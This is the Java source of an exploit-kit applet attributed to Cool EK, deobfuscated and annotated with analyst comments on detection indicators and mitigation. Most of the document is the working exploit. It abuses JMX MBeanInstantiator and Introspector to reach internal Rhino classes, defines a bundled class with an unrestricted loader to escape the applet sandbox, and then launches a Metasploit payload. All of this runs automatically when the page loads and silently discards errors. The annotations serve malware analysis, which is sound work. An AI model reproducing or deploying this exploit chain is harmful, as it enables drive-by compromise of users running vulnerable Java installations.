
Source Code of Exploit

/*
*   From Paunch with love (Java 1.7.0_11 Exploit)
*
*   Deobfuscated from Cool EK by SecurityObscurity
*
*   https://twitter.com/SecObscurity
*/
import java.applet.Applet;
import com.sun.jmx.mbeanserver.Introspector;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles.Lookup;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import javax.management.ReflectionException;
import java.io.*;
import metasploit.Payload;

/**
 * Applet entry class of an exploit-kit sample (see the file header for the targeted JRE
 * build), annotated here for analysis and detection.
 *
 * <p>What the visible code does, in order:
 * <ol>
 *   <li>reads a second class file, {@code B.class}, from the applet's jar into memory;</li>
 *   <li>obtains {@code Class} objects for two {@code sun.org.mozilla.javascript.internal}
 *       types through {@code MBeanInstantiator.findClass} instead of loading them
 *       directly (see {@link #gimmeClass});</li>
 *   <li>obtains {@code Method} objects on those types through
 *       {@code Introspector.elementFromComplex} instead of calling the reflection API on
 *       them directly (see {@link #getMethod});</li>
 *   <li>uses the resulting class loader to define and instantiate {@code B} from the raw
 *       bytes, then calls {@code metasploit.Payload.main(null)}.</li>
 * </ol>
 *
 * <p>Neither {@code B.class} nor {@code metasploit.Payload} is part of this listing, so what
 * they do cannot be stated from this page.
 *
 * <p>Indicators a reviewer can take from this listing: an applet whose constant pool
 * references {@code com.sun.jmx.mbeanserver.*} together with the string names
 * {@code sun.org.mozilla.javascript.internal.Context} and
 * {@code ...GeneratedClassLoader}; a bundled class resource that is only ever loaded as
 * bytes; and a blanket {@code catch (Throwable)} around the whole of {@code init()}.
 * The header ties the sample to one specific JRE build, so the vendor's fixed release for
 * that build (and disabling the browser Java plug-in where it is not needed) is the
 * mitigation to check first.
 */
public class Exploit extends Applet
{

  /**
   * Applet lifecycle hook; everything this sample does happens here, i.e. as soon as the
   * hosting page initialises the applet, with no user interaction in the code itself.
   */
  public void init()
  {

    try
    {
           int length;
           byte[] buffer = new byte[5000];
           ByteArrayOutputStream os = new ByteArrayOutputStream();

           // read in the class file from the jar
           // (resolved relative to this class; if the resource is missing `is` is null and
           // the resulting NullPointerException is swallowed by the catch below.
           // The stream is never closed.)
           InputStream is = getClass().getResourceAsStream("B.class");

           // and write it out to the byte array stream
           while( ( length = is.read( buffer ) ) > 0 )
               os.write( buffer, 0, length );

           // convert it to a simple byte array
           buffer = os.toByteArray();

          // Class lookup goes through the JMX helper below rather than Class.forName on
          // the target name. The package name suggests the JDK-internal copy of the
          // Rhino JavaScript engine; NOTE(review): such sun.* packages are normally not
          // accessible to sandboxed applet code - confirm against the JRE's
          // package.access setting for the build under analysis.
          Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");

          // "enter" is looked up with flag=true, so only a zero-parameter overload matches;
          // it is invoked with a null receiver, i.e. as a static method.
          Method method = getMethod(class1, "enter", true);
          Object obj = method.invoke(null, new Object[0]);
          // "createClassLoader" is invoked on the object returned by enter() with a
          // single null argument (new Object[1] is a one-element array holding null).
          Method method1 = getMethod(class1, "createClassLoader", false);
          Object obj1 = method1.invoke(obj, new Object[1]);

          Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
          Method method2 = getMethod(class2, "defineClass", false);

          // defineClass is called with a null class name and the bytes of B.class, so B is
          // defined by the loader obtained above rather than by the applet's own loader.
          Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
          // Instantiation runs B's static initialiser and no-arg constructor.
          // NOTE(review): B.class is not shown on this page; presumably it is what changes
          // the applet's privileges before the payload call below - confirm by inspecting
          // the sample's jar in an isolated analysis environment.
          my_class.newInstance();

          // Hands control to a class from the imported metasploit package (not shown here).
          Payload.main(null);

    }
    // Every failure, including Errors, is discarded: on a JRE where any step above fails
    // nothing is thrown out of init() and nothing is logged by this code.
    catch (Throwable localThrowable){}

  }


  /**
   * Finds a method on {@code class1} by name without calling the reflection lookup
   * methods on {@code class1} directly: the method array is fetched through
   * {@code Introspector.elementFromComplex(class1, "declaredMethods")}.
   *
   * @param class1 class whose methods are searched
   * @param s      method name to match
   * @param flag   when {@code true}, only a method with zero parameters is accepted;
   *               when {@code false}, the first method with a matching name is returned
   * @return the first matching method in array order, or {@code null} if none matches or
   *         any {@code Exception} is raised during the lookup (the exception is swallowed)
   */
   private Method getMethod(Class class1, String s, boolean flag)
  {
    try {
      Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
      Method[] amethod1 = amethod;

      for (int i = 0; i < amethod1.length; i++) {
        Method method = amethod1[i];
        String s1 = method.getName();
        Class[] aclass = method.getParameterTypes();
        // Names are compared by reference (==), not with equals().
        // NOTE(review): possibly an artifact of the deobfuscation mentioned in the header.
        if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
      }
    } catch (Exception localException) {  }

    return null;
  }

  /**
   * Resolves a class by name through a JMX {@code MBeanInstantiator}.
   *
   * <p>A fresh {@code JmxMBeanServer} is created, its {@code MBeanInstantiator} is taken,
   * and the public {@code findClass(String, ClassLoader)} method is looked up reflectively
   * and invoked with the requested name and a {@code null} class loader.
   *
   * @param s fully qualified name of the class to resolve
   * @return the {@code Class} object returned by {@code findClass}
   * @throws ReflectionException          declared; raised by the JMX layer
   * @throws ReflectiveOperationException if the reflective lookup or invocation fails
   */
  private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  {
    // Always null; passed below as the ClassLoader argument of findClass.
    Object obj = null;
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();

    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  }

}
